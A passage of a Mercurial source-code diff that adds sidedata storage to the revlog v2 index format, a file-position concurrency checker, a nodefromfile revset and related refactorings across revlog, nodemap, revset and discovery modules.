nodemaputil.setup_persistent_nodemap(tr, self)
self._chunkclear()
@@ -2082,20 +2113,15 @@
if sidedata is None:
sidedata = {}
- flags = flags & ~REVIDX_SIDEDATA
elif not self.hassidedata:
raise error.ProgrammingError(
_(b"trying to add sidedata to a revlog who don't support them")
)
- else:
- flags |= REVIDX_SIDEDATA
if flags:
node = node or self.hash(text, p1, p2)
- rawtext, validatehash = flagutil.processflagswrite(
- self, text, flags, sidedata=sidedata
- )
+ rawtext, validatehash = flagutil.processflagswrite(self, text, flags)
# If the flag processor modifies the revision data, ignore any provided
# cachedelta.
@@ -2111,8 +2137,9 @@
)
node = node or self.hash(rawtext, p1, p2)
- if self.index.has_node(node):
- return node
+ rev = self.index.get_rev(node)
+ if rev is not None:
+ return rev
if validatehash:
self.checkhash(rawtext, node, p1=p1, p2=p2)
@@ -2127,6 +2154,7 @@
flags,
cachedelta=cachedelta,
deltacomputer=deltacomputer,
+ sidedata=sidedata,
)
def addrawrevision(
@@ -2140,6 +2168,7 @@
flags,
cachedelta=None,
deltacomputer=None,
+ sidedata=None,
):
"""add a raw revision with known flags, node and parents
useful when reusing a revision not stored in this revlog (ex: received
@@ -2162,6 +2191,7 @@
ifh,
dfh,
deltacomputer=deltacomputer,
+ sidedata=sidedata,
)
finally:
if dfh:
@@ -2237,7 +2267,9 @@
compressor = engine.revlogcompressor(self._compengineopts)
self._decompressors[t] = compressor
except KeyError:
- raise error.RevlogError(_(b'unknown compression type %r') % t)
+ raise error.RevlogError(
+ _(b'unknown compression type %s') % binascii.hexlify(t)
+ )
return compressor.decompress(data)
@@ -2255,6 +2287,7 @@
dfh,
alwayscache=False,
deltacomputer=None,
+ sidedata=None,
):
"""internal function to add revisions to the log
@@ -2287,7 +2320,23 @@
curr = len(self)
prev = curr - 1
- offset = self.end(prev)
+
+ offset = self._get_data_offset(prev)
+
+ if self._concurrencychecker:
+ if self._inline:
+ # offset is "as if" it were in the .d file, so we need to add on
+ # the size of the entry metadata.
+ self._concurrencychecker(
+ ifh, self.indexfile, offset + curr * self.index.entry_size
+ )
+ else:
+ # Entries in the .i are a consistent size.
+ self._concurrencychecker(
+ ifh, self.indexfile, curr * self.index.entry_size
+ )
+ self._concurrencychecker(dfh, self.datafile, offset)
+
p1r, p2r = self.rev(p1), self.rev(p2)
# full versions are inserted when the needed deltas
@@ -2309,6 +2358,16 @@
deltainfo = deltacomputer.finddeltainfo(revinfo, fh)
+ if sidedata:
+ serialized_sidedata = sidedatautil.serialize_sidedata(sidedata)
+ sidedata_offset = offset + deltainfo.deltalen
+ else:
+ serialized_sidedata = b""
+ # Don't store the offset if the sidedata is empty, that way
+ # we can easily detect empty sidedata and they will be no different
+ # than ones we manually add.
+ sidedata_offset = 0
+
e = (
offset_type(offset, flags),
deltainfo.deltalen,
@@ -2318,12 +2377,24 @@
p1r,
p2r,
node,
+ sidedata_offset,
+ len(serialized_sidedata),
)
+
+ if self.version & 0xFFFF != REVLOGV2:
+ e = e[:8]
+
self.index.append(e)
-
entry = self._io.packentry(e, self.node, self.version, curr)
self._writeentry(
- transaction, ifh, dfh, entry, deltainfo.data, link, offset
+ transaction,
+ ifh,
+ dfh,
+ entry,
+ deltainfo.data,
+ link,
+ offset,
+ serialized_sidedata,
)
rawtext = btext[0]
@@ -2334,9 +2405,31 @@
if type(rawtext) == bytes: # only accept immutable objects
self._revisioncache = (node, curr, rawtext)
self._chainbasecache[curr] = deltainfo.chainbase
- return node
-
- def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset):
+ return curr
+
+ def _get_data_offset(self, prev):
+ """Returns the current offset in the (in-transaction) data file.
+ Versions < 2 of the revlog can get this 0(1), revlog v2 needs a docket
+ file to store that information: since sidedata can be rewritten to the
+ end of the data file within a transaction, you can have cases where, for
+ example, rev `n` does not have sidedata while rev `n - 1` does, leading
+ to `n - 1`'s sidedata being written after `n`'s data.
+
+ TODO cache this in a docket file before getting out of experimental."""
+ if self.version & 0xFFFF != REVLOGV2:
+ return self.end(prev)
+
+ offset = 0
+ for rev, entry in enumerate(self.index):
+ sidedata_end = entry[8] + entry[9]
+ # Sidedata for a previous rev has potentially been written after
+ # this rev's end, so take the max.
+ offset = max(self.end(rev), offset, sidedata_end)
+ return offset
+
+ def _writeentry(
+ self, transaction, ifh, dfh, entry, data, link, offset, sidedata
+ ):
# Files opened in a+ mode have inconsistent behavior on various
# platforms. Windows requires that a file positioning call be made
# when the file handle transitions between reads and writes. See
@@ -2360,13 +2453,17 @@
if data[0]:
dfh.write(data[0])
dfh.write(data[1])
+ if sidedata:
+ dfh.write(sidedata)
ifh.write(entry)
else:
- offset += curr * self._io.size
+ offset += curr * self.index.entry_size
transaction.add(self.indexfile, offset)
ifh.write(entry)
ifh.write(data[0])
ifh.write(data[1])
+ if sidedata:
+ ifh.write(sidedata)
self._enforceinlinesize(transaction, ifh)
nodemaputil.setup_persistent_nodemap(transaction, self)
@@ -2375,6 +2472,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=False,
addrevisioncb=None,
duplicaterevisioncb=None,
):
@@ -2397,7 +2495,7 @@
if r:
end = self.end(r - 1)
ifh = self._indexfp(b"a+")
- isize = r * self._io.size
+ isize = r * self.index.entry_size
if self._inline:
transaction.add(self.indexfile, end + isize)
dfh = None
@@ -2418,15 +2516,16 @@
deltacomputer = deltautil.deltacomputer(self)
# loop through our set of deltas
for data in deltas:
- node, p1, p2, linknode, deltabase, delta, flags = data
+ node, p1, p2, linknode, deltabase, delta, flags, sidedata = data
link = linkmapper(linknode)
flags = flags or REVIDX_DEFAULT_FLAGS
- if self.index.has_node(node):
+ rev = self.index.get_rev(node)
+ if rev is not None:
# this can happen if two branches make the same change
- self._nodeduplicatecallback(transaction, node)
+ self._nodeduplicatecallback(transaction, rev)
if duplicaterevisioncb:
- duplicaterevisioncb(self, node)
+ duplicaterevisioncb(self, rev)
empty = False
continue
@@ -2464,7 +2563,7 @@
# We're only using addgroup() in the context of changegroup
# generation so the revision data can always be handled as raw
# by the flagprocessor.
- self._addrevision(
+ rev = self._addrevision(
node,
None,
transaction,
@@ -2475,12 +2574,13 @@
(baserev, delta),
ifh,
dfh,
- alwayscache=bool(addrevisioncb),
+ alwayscache=alwayscache,
deltacomputer=deltacomputer,
+ sidedata=sidedata,
)
if addrevisioncb:
- addrevisioncb(self, node)
+ addrevisioncb(self, rev)
empty = False
if not dfh and not self._inline:
@@ -2551,9 +2651,9 @@
end = self.start(rev)
if not self._inline:
transaction.add(self.datafile, end)
- end = rev * self._io.size
+ end = rev * self.index.entry_size
else:
- end += rev * self._io.size
+ end += rev * self.index.entry_size
transaction.add(self.indexfile, end)
@@ -2592,7 +2692,7 @@
f.seek(0, io.SEEK_END)
actual = f.tell()
f.close()
- s = self._io.size
+ s = self.index.entry_size
i = max(0, actual // s)
di = actual - (i * s)
if self._inline:
@@ -2621,6 +2721,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
if nodesorder not in (b'nodes', b'storage', b'linear', None):
raise error.ProgrammingError(
@@ -2649,6 +2750,7 @@
deltamode=deltamode,
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
+ sidedata_helpers=sidedata_helpers,
)
DELTAREUSEALWAYS = b'always'
@@ -3087,3 +3189,54 @@
)
return d
+
+ def rewrite_sidedata(self, helpers, startrev, endrev):
+ if self.version & 0xFFFF != REVLOGV2:
+ return
+ # inline are not yet supported because they suffer from an issue when
+ # rewriting them (since it's not an append-only operation).
+ # See issue6485.
+ assert not self._inline
+ if not helpers[1] and not helpers[2]:
+ # Nothing to generate or remove
+ return
+
+ new_entries = []
+ # append the new sidedata
+ with self._datafp(b'a+') as fp:
+ # Maybe this bug still exists, see revlog._writeentry
+ fp.seek(0, os.SEEK_END)
+ current_offset = fp.tell()
+ for rev in range(startrev, endrev + 1):
+ entry = self.index[rev]
+ new_sidedata = storageutil.run_sidedata_helpers(
+ store=self,
+ sidedata_helpers=helpers,
+ sidedata={},
+ rev=rev,
+ )
+
+ serialized_sidedata = sidedatautil.serialize_sidedata(
+ new_sidedata
+ )
+ if entry[8] != 0 or entry[9] != 0:
+ # rewriting entries that already have sidedata is not
+ # supported yet, because it introduces garbage data in the
+ # revlog.
+ msg = b"Rewriting existing sidedata is not supported yet"
+ raise error.Abort(msg)
+ entry = entry[:8]
+ entry += (current_offset, len(serialized_sidedata))
+
+ fp.write(serialized_sidedata)
+ new_entries.append(entry)
+ current_offset += len(serialized_sidedata)
+
+ # rewrite the new index entries
+ with self._indexfp(b'w+') as fp:
+ fp.seek(startrev * self.index.entry_size)
+ for i, entry in enumerate(new_entries):
+ rev = startrev + i
+ self.index.replace_sidedata_info(rev, entry[8], entry[9])
+ packed = self._io.packentry(entry, self.node, self.version, rev)
+ fp.write(packed)
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/mercurial/revlogutils/concurrency_checker.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,38 @@
+from ..i18n import _
+from .. import error
+
+
+def get_checker(ui, revlog_name=b'changelog'):
+ """Get a function that checks file handle position is as expected.
+
+ This is used to ensure that files haven't been modified outside of our
+ knowledge (such as on a networked filesystem, if `hg debuglocks` was used,
+ or writes to .hg that ignored locks happened).
+
+ Due to revlogs supporting a concept of buffered, delayed, or diverted
+ writes, we're allowing the files to be shorter than expected (the data may
+ not have been written yet), but they can't be longer.
+
+ Please note that this check is not perfect; it can't detect all cases (there
+ may be false-negatives/false-OKs), but it should never claim there's an
+ issue when there isn't (false-positives/false-failures).
+ """
+
+ vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name)
+ # Avoid any `fh.tell` cost if this isn't enabled.
+ if not vpos or vpos not in [b'log', b'warn', b'fail']:
+ return None
+
+ def _checker(fh, fn, expected):
+ if fh.tell() <= expected:
+ return
+
+ msg = _(b'%s: file cursor at position %d, expected %d')
+ # Always log if we're going to warn or fail.
+ ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected)
+ if vpos == b'warn':
+ ui.warn((msg + b'\n') % (fn, fh.tell(), expected))
+ elif vpos == b'fail':
+ raise error.RevlogError(msg % (fn, fh.tell(), expected))
+
+ return _checker
--- a/mercurial/revlogutils/constants.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/constants.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revlogdeltas.py - constant used for revlog logic
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2018 Octobus <contact@octobus.net>
#
# This software may be used and distributed according to the terms of the
@@ -9,14 +9,21 @@
from __future__ import absolute_import
+import struct
+
from ..interfaces import repository
-# revlog header flags
+### main revlog header
+
+INDEX_HEADER = struct.Struct(b">I")
+
+## revlog version
REVLOGV0 = 0
REVLOGV1 = 1
# Dummy value until file format is finalized.
-# Reminder: change the bounds check in revlog.__init__ when this is changed.
REVLOGV2 = 0xDEAD
+
+## global revlog header flags
# Shared across v1 and v2.
FLAG_INLINE_DATA = 1 << 16
# Only used by v1, implied by v2.
@@ -27,6 +34,46 @@
REVLOGV1_FLAGS = FLAG_INLINE_DATA | FLAG_GENERALDELTA
REVLOGV2_FLAGS = FLAG_INLINE_DATA
+### individual entry
+
+## index v0:
+# 4 bytes: offset
+# 4 bytes: compressed length
+# 4 bytes: base rev
+# 4 bytes: link rev
+# 20 bytes: parent 1 nodeid
+# 20 bytes: parent 2 nodeid
+# 20 bytes: nodeid
+INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s")
+
+## index v1
+# 6 bytes: offset
+# 2 bytes: flags
+# 4 bytes: compressed length
+# 4 bytes: uncompressed length
+# 4 bytes: base rev
+# 4 bytes: link rev
+# 4 bytes: parent 1 rev
+# 4 bytes: parent 2 rev
+# 32 bytes: nodeid
+INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x")
+assert INDEX_ENTRY_V1.size == 32 * 2
+
+# 6 bytes: offset
+# 2 bytes: flags
+# 4 bytes: compressed length
+# 4 bytes: uncompressed length
+# 4 bytes: base rev
+# 4 bytes: link rev
+# 4 bytes: parent 1 rev
+# 4 bytes: parent 2 rev
+# 32 bytes: nodeid
+# 8 bytes: sidedata offset
+# 4 bytes: sidedata compressed length
+# 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page)
+INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x")
+assert INDEX_ENTRY_V2.size == 32 * 3
+
# revlog index flags
# For historical reasons, revlog's internal flags were exposed via the
--- a/mercurial/revlogutils/deltas.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/deltas.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revlogdeltas.py - Logic around delta computation for revlog
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2018 Octobus <contact@octobus.net>
#
# This software may be used and distributed according to the terms of the
--- a/mercurial/revlogutils/flagutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/flagutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -84,7 +84,7 @@
flagprocessors[flag] = processor
-def processflagswrite(revlog, text, flags, sidedata):
+def processflagswrite(revlog, text, flags):
"""Inspect revision data flags and applies write transformations defined
by registered flag processors.
@@ -100,9 +100,12 @@
processed text and ``validatehash`` is a bool indicating whether the
returned text should be checked for hash integrity.
"""
- return _processflagsfunc(revlog, text, flags, b'write', sidedata=sidedata)[
- :2
- ]
+ return _processflagsfunc(
+ revlog,
+ text,
+ flags,
+ b'write',
+ )[:2]
def processflagsread(revlog, text, flags):
@@ -145,14 +148,14 @@
return _processflagsfunc(revlog, text, flags, b'raw')[1]
-def _processflagsfunc(revlog, text, flags, operation, sidedata=None):
+def _processflagsfunc(revlog, text, flags, operation):
"""internal function to process flag on a revlog
This function is private to this module, code should never needs to call it
directly."""
# fast path: no flag processors will run
if flags == 0:
- return text, True, {}
+ return text, True
if operation not in (b'read', b'write', b'raw'):
raise error.ProgrammingError(_(b"invalid '%s' operation") % operation)
# Check all flags are known.
@@ -168,7 +171,6 @@
if operation == b'write':
orderedflags = reversed(orderedflags)
- outsidedata = {}
for flag in orderedflags:
# If a flagprocessor has been registered for a known flag, apply the
# related operation transform and update result tuple.
@@ -186,10 +188,9 @@
if operation == b'raw':
vhash = rawtransform(revlog, text)
elif operation == b'read':
- text, vhash, s = readtransform(revlog, text)
- outsidedata.update(s)
+ text, vhash = readtransform(revlog, text)
else: # write operation
- text, vhash = writetransform(revlog, text, sidedata)
+ text, vhash = writetransform(revlog, text)
validatehash = validatehash and vhash
- return text, validatehash, outsidedata
+ return text, validatehash
--- a/mercurial/revlogutils/nodemap.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/nodemap.py Tue Apr 20 11:01:06 2021 -0400
@@ -53,7 +53,11 @@
try:
with revlog.opener(filename) as fd:
if use_mmap:
- data = util.buffer(util.mmapread(fd, data_length))
+ try:
+ data = util.buffer(util.mmapread(fd, data_length))
+ except ValueError:
+ # raised when the read file is too small
+ data = b''
else:
data = fd.read(data_length)
except (IOError, OSError) as e:
@@ -81,9 +85,9 @@
if tr.hasfinalize(callback_id):
return # no need to register again
tr.addpending(
- callback_id, lambda tr: _persist_nodemap(tr, revlog, pending=True)
+ callback_id, lambda tr: persist_nodemap(tr, revlog, pending=True)
)
- tr.addfinalize(callback_id, lambda tr: _persist_nodemap(tr, revlog))
+ tr.addfinalize(callback_id, lambda tr: persist_nodemap(tr, revlog))
class _NoTransaction(object):
@@ -123,20 +127,33 @@
return # we do not use persistent_nodemap on this revlog
notr = _NoTransaction()
- _persist_nodemap(notr, revlog)
+ persist_nodemap(notr, revlog)
for k in sorted(notr._postclose):
notr._postclose[k](None)
-def _persist_nodemap(tr, revlog, pending=False):
+def delete_nodemap(tr, repo, revlog):
+ """ Delete nodemap data on disk for a given revlog"""
+ if revlog.nodemap_file is None:
+ msg = "calling persist nodemap on a revlog without the feature enabled"
+ raise error.ProgrammingError(msg)
+ repo.svfs.unlink(revlog.nodemap_file)
+
+
+def persist_nodemap(tr, revlog, pending=False, force=False):
"""Write nodemap data on disk for a given revlog"""
if getattr(revlog, 'filteredrevs', ()):
raise error.ProgrammingError(
"cannot persist nodemap of a filtered changelog"
)
if revlog.nodemap_file is None:
- msg = "calling persist nodemap on a revlog without the feature enableb"
- raise error.ProgrammingError(msg)
+ if force:
+ revlog.nodemap_file = get_nodemap_file(
+ revlog.opener, revlog.indexfile
+ )
+ else:
+ msg = "calling persist nodemap on a revlog without the feature enabled"
+ raise error.ProgrammingError(msg)
can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental")
ondisk_docket = revlog._nodemap_docket
@@ -634,3 +651,14 @@
if isinstance(entry, dict):
return _find_node(entry, node[1:])
return entry
+
+
+def get_nodemap_file(opener, indexfile):
+ if indexfile.endswith(b'.a'):
+ pending_path = indexfile[:-4] + b".n.a"
+ if opener.exists(pending_path):
+ return pending_path
+ else:
+ return indexfile[:-4] + b".n"
+ else:
+ return indexfile[:-2] + b".n"
--- a/mercurial/revlogutils/sidedata.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlogutils/sidedata.py Tue Apr 20 11:01:06 2021 -0400
@@ -13,9 +13,8 @@
The current implementation is experimental and subject to changes. Do not rely
on it in production.
-Sidedata are stored in the revlog itself, within the revision rawtext. They
-are inserted and removed from it using the flagprocessors mechanism. The following
-format is currently used::
+Sidedata are stored in the revlog itself, thanks to a new version of the
+revlog. The following format is currently used::
initial header:
<number of sidedata; 2 bytes>
@@ -60,48 +59,35 @@
SIDEDATA_ENTRY = struct.Struct('>HL20s')
-def sidedatawriteprocessor(rl, text, sidedata):
+def serialize_sidedata(sidedata):
sidedata = list(sidedata.items())
sidedata.sort()
- rawtext = [SIDEDATA_HEADER.pack(len(sidedata))]
+ buf = [SIDEDATA_HEADER.pack(len(sidedata))]
for key, value in sidedata:
digest = hashutil.sha1(value).digest()
- rawtext.append(SIDEDATA_ENTRY.pack(key, len(value), digest))
+ buf.append(SIDEDATA_ENTRY.pack(key, len(value), digest))
for key, value in sidedata:
- rawtext.append(value)
- rawtext.append(bytes(text))
- return b''.join(rawtext), False
+ buf.append(value)
+ buf = b''.join(buf)
+ return buf
-def sidedatareadprocessor(rl, text):
+def deserialize_sidedata(blob):
sidedata = {}
offset = 0
- (nbentry,) = SIDEDATA_HEADER.unpack(text[: SIDEDATA_HEADER.size])
+ (nbentry,) = SIDEDATA_HEADER.unpack(blob[: SIDEDATA_HEADER.size])
offset += SIDEDATA_HEADER.size
dataoffset = SIDEDATA_HEADER.size + (SIDEDATA_ENTRY.size * nbentry)
for i in range(nbentry):
nextoffset = offset + SIDEDATA_ENTRY.size
- key, size, storeddigest = SIDEDATA_ENTRY.unpack(text[offset:nextoffset])
+ key, size, storeddigest = SIDEDATA_ENTRY.unpack(blob[offset:nextoffset])
offset = nextoffset
# read the data associated with that entry
nextdataoffset = dataoffset + size
- entrytext = text[dataoffset:nextdataoffset]
+ entrytext = bytes(blob[dataoffset:nextdataoffset])
readdigest = hashutil.sha1(entrytext).digest()
if storeddigest != readdigest:
raise error.SidedataHashError(key, storeddigest, readdigest)
sidedata[key] = entrytext
dataoffset = nextdataoffset
- text = text[dataoffset:]
- return text, True, sidedata
-
-
-def sidedatarawprocessor(rl, text):
- # side data modifies rawtext and prevent rawtext hash validation
- return False
-
-
-processors = (
- sidedatareadprocessor,
- sidedatawriteprocessor,
- sidedatarawprocessor,
-)
+ return sidedata
--- a/mercurial/revset.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revset.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revset.py - revision set queries for mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -41,6 +41,7 @@
from .utils import (
dateutil,
stringutil,
+ urlutil,
)
# helpers for processing parsed tree
@@ -1335,6 +1336,29 @@
return subset & rs
+@predicate(b'nodefromfile(path)')
+def nodefromfile(repo, subset, x):
+ """
+ An alias for ``::.`` (ancestors of the working directory's first parent).
+ If file pattern is specified, the histories of files matching given
+ pattern in the revision given by startrev are followed, including copies.
+ """
+ path = getstring(x, _(b"nodefromfile require a file path"))
+ listed_rev = set()
+ try:
+ with pycompat.open(path, 'rb') as f:
+ for line in f:
+ n = line.strip()
+ rn = _node(repo, n)
+ if rn is not None:
+ listed_rev.add(rn)
+ except IOError as exc:
+ m = _(b'cannot open nodes file "%s": %s')
+ m %= (path, encoding.strtolocal(exc.strerror))
+ raise error.Abort(m)
+ return subset & baseset(listed_rev)
+
+
@predicate(b'all()', safe=True)
def getall(repo, subset, x):
"""All changesets, the same as ``0:tip``."""
@@ -1697,13 +1721,9 @@
return subset & names
-@predicate(b'id(string)', safe=True)
-def node_(repo, subset, x):
- """Revision non-ambiguously specified by the given hex string prefix."""
- # i18n: "id" is a keyword
- l = getargs(x, 1, 1, _(b"id requires one argument"))
- # i18n: "id" is a keyword
- n = getstring(l[0], _(b"id requires a string"))
+def _node(repo, n):
+ """process a node input"""
+ rn = None
if len(n) == 40:
try:
rn = repo.changelog.rev(bin(n))
@@ -1712,7 +1732,6 @@
except (LookupError, TypeError):
rn = None
else:
- rn = None
try:
pm = scmutil.resolvehexnodeidprefix(repo, n)
if pm is not None:
@@ -1721,6 +1740,17 @@
pass
except error.WdirUnsupported:
rn = wdirrev
+ return rn
+
+
+@predicate(b'id(string)', safe=True)
+def node_(repo, subset, x):
+ """Revision non-ambiguously specified by the given hex string prefix."""
+ # i18n: "id" is a keyword
+ l = getargs(x, 1, 1, _(b"id requires one argument"))
+ # i18n: "id" is a keyword
+ n = getstring(l[0], _(b"id requires a string"))
+ rn = _node(repo, n)
if rn is None:
return baseset()
@@ -1825,27 +1855,28 @@
dest = (
l and getstring(l[0], _(b"outgoing requires a repository path")) or b''
)
- if not dest:
- # ui.paths.getpath() explicitly tests for None, not just a boolean
- dest = None
- path = repo.ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.Abort(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
- dest = path.pushloc or path.loc
- branches = path.branch, []
-
- revs, checkout = hg.addbranchrevs(repo, repo, branches, [])
- if revs:
- revs = [repo.lookup(rev) for rev in revs]
- other = hg.peer(repo, {}, dest)
- repo.ui.pushbuffer()
- outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs)
- repo.ui.popbuffer()
+ if dest:
+ dests = [dest]
+ else:
+ dests = []
+ missing = set()
+ for path in urlutil.get_push_paths(repo, repo.ui, dests):
+ dest = path.pushloc or path.loc
+ branches = path.branch, []
+
+ revs, checkout = hg.addbranchrevs(repo, repo, branches, [])
+ if revs:
+ revs = [repo.lookup(rev) for rev in revs]
+ other = hg.peer(repo, {}, dest)
+ try:
+ repo.ui.pushbuffer()
+ outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs)
+ repo.ui.popbuffer()
+ finally:
+ other.close()
+ missing.update(outgoing.missing)
cl = repo.changelog
- o = {cl.rev(r) for r in outgoing.missing}
+ o = {cl.rev(r) for r in missing}
return subset & o
@@ -2089,8 +2120,11 @@
if len(l) > 1:
# i18n: "remote" is a keyword
dest = getstring(l[1], _(b"remote requires a repository path"))
- dest = repo.ui.expandpath(dest or b'default')
- dest, branches = hg.parseurl(dest)
+ if not dest:
+ dest = b'default'
+ dest, branches = urlutil.get_unique_pull_path(
+ b'remote', repo, repo.ui, dest
+ )
other = hg.peer(repo, {}, dest)
n = other.lookup(q)
--- a/mercurial/revsetlang.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revsetlang.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revsetlang.py - parser, tokenizer and utility for revision set language
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/scmutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/scmutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# scmutil.py - Mercurial core utility functions
#
-# Copyright Matt Mackall <mpm@selenic.com>
+# Copyright Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -181,17 +181,6 @@
encoding.strtolocal(inst.strerror),
)
)
- except error.OutOfBandError as inst:
- detailed_exit_code = 100
- if inst.args:
- msg = _(b"abort: remote error:\n")
- else:
- msg = _(b"abort: remote error\n")
- ui.error(msg)
- if inst.args:
- ui.error(b''.join(inst.args))
- if inst.hint:
- ui.error(b'(%s)\n' % inst.hint)
except error.RepoError as inst:
ui.error(_(b"abort: %s\n") % inst)
if inst.hint:
@@ -201,7 +190,9 @@
msg = inst.args[1]
if isinstance(msg, type(u'')):
msg = pycompat.sysbytes(msg)
- if not isinstance(msg, bytes):
+ if msg is None:
+ ui.error(b"\n")
+ elif not isinstance(msg, bytes):
ui.error(b" %r\n" % (msg,))
elif not msg:
ui.error(_(b" empty string\n"))
@@ -229,6 +220,10 @@
detailed_exit_code = 20
elif isinstance(inst, error.ConfigError):
detailed_exit_code = 30
+ elif isinstance(inst, error.HookAbort):
+ detailed_exit_code = 40
+ elif isinstance(inst, error.RemoteError):
+ detailed_exit_code = 100
elif isinstance(inst, error.SecurityError):
detailed_exit_code = 150
elif isinstance(inst, error.CanceledError):
--- a/mercurial/server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# server.py - utility and factory of server
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -22,7 +22,10 @@
util,
)
-from .utils import procutil
+from .utils import (
+ procutil,
+ urlutil,
+)
def runservice(
@@ -184,7 +187,7 @@
def _createhgwebservice(ui, repo, opts):
# this way we can check if something was given in the command-line
if opts.get(b'port'):
- opts[b'port'] = util.getport(opts.get(b'port'))
+ opts[b'port'] = urlutil.getport(opts.get(b'port'))
alluis = {ui}
if repo:
--- a/mercurial/setdiscovery.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/setdiscovery.py Tue Apr 20 11:01:06 2021 -0400
@@ -286,8 +286,6 @@
ui,
local,
remote,
- initialsamplesize=100,
- fullsamplesize=200,
abortwhenunrelated=True,
ancestorsof=None,
audit=None,
@@ -315,7 +313,8 @@
ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
initial_head_exchange = ui.configbool(b'devel', b'discovery.exchange-heads')
-
+ initialsamplesize = ui.configint(b'devel', b'discovery.sample-size.initial')
+ fullsamplesize = ui.configint(b'devel', b'discovery.sample-size')
# We also ask remote about all the local heads. That set can be arbitrarily
# large, so we used to limit it size to `initialsamplesize`. We no longer
# do as it proved counter productive. The skipped heads could lead to a
@@ -391,7 +390,7 @@
if audit is not None:
audit[b'total-roundtrips'] = 1
- if cl.tip() == nullid:
+ if cl.tiprev() == nullrev:
if srvheadhashes != [nullid]:
return [nullid], True, srvheadhashes
return [nullid], False, []
@@ -430,9 +429,12 @@
# full blown discovery
# if the server has a limit to its arguments size, we can't grow the sample.
- hard_limit_sample = remote.limitedarguments
- grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample')
- hard_limit_sample = hard_limit_sample and grow_sample
+ configbool = local.ui.configbool
+ grow_sample = configbool(b'devel', b'discovery.grow-sample')
+ grow_sample = grow_sample and not remote.limitedarguments
+
+ dynamic_sample = configbool(b'devel', b'discovery.grow-sample.dynamic')
+ hard_limit_sample = not (dynamic_sample or remote.limitedarguments)
randomize = ui.configbool(b'devel', b'discovery.randomize')
disco = partialdiscovery(
@@ -455,7 +457,7 @@
ui.debug(b"taking initial sample\n")
samplefunc = disco.takefullsample
targetsize = fullsamplesize
- if not hard_limit_sample:
+ if grow_sample:
fullsamplesize = int(fullsamplesize * samplegrowth)
else:
# use even cheaper initial sample
--- a/mercurial/shelve.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/shelve.py Tue Apr 20 11:01:06 2021 -0400
@@ -241,7 +241,7 @@
bin(h) for h in d[b'nodestoremove'].split(b' ')
]
except (ValueError, TypeError, KeyError) as err:
- raise error.CorruptedState(pycompat.bytestr(err))
+ raise error.CorruptedState(stringutil.forcebytestr(err))
@classmethod
def _getversion(cls, repo):
@@ -250,7 +250,7 @@
try:
version = int(fp.readline().strip())
except ValueError as err:
- raise error.CorruptedState(pycompat.bytestr(err))
+ raise error.CorruptedState(stringutil.forcebytestr(err))
finally:
fp.close()
return version
@@ -534,7 +534,7 @@
parent = parents[0]
origbranch = wctx.branch()
- if parent.node() != nullid:
+ if parent.rev() != nullrev:
desc = b"changes to: %s" % parent.description().split(b'\n', 1)[0]
else:
desc = b'(changes in empty repository)'
@@ -812,7 +812,7 @@
with repo.lock():
checkparents(repo, state)
ms = mergestatemod.mergestate.read(repo)
- if list(ms.unresolved()):
+ if ms.unresolvedcount():
raise error.Abort(
_(b"unresolved conflicts, can't continue"),
hint=_(b"see 'hg resolve', then 'hg unshelve --continue'"),
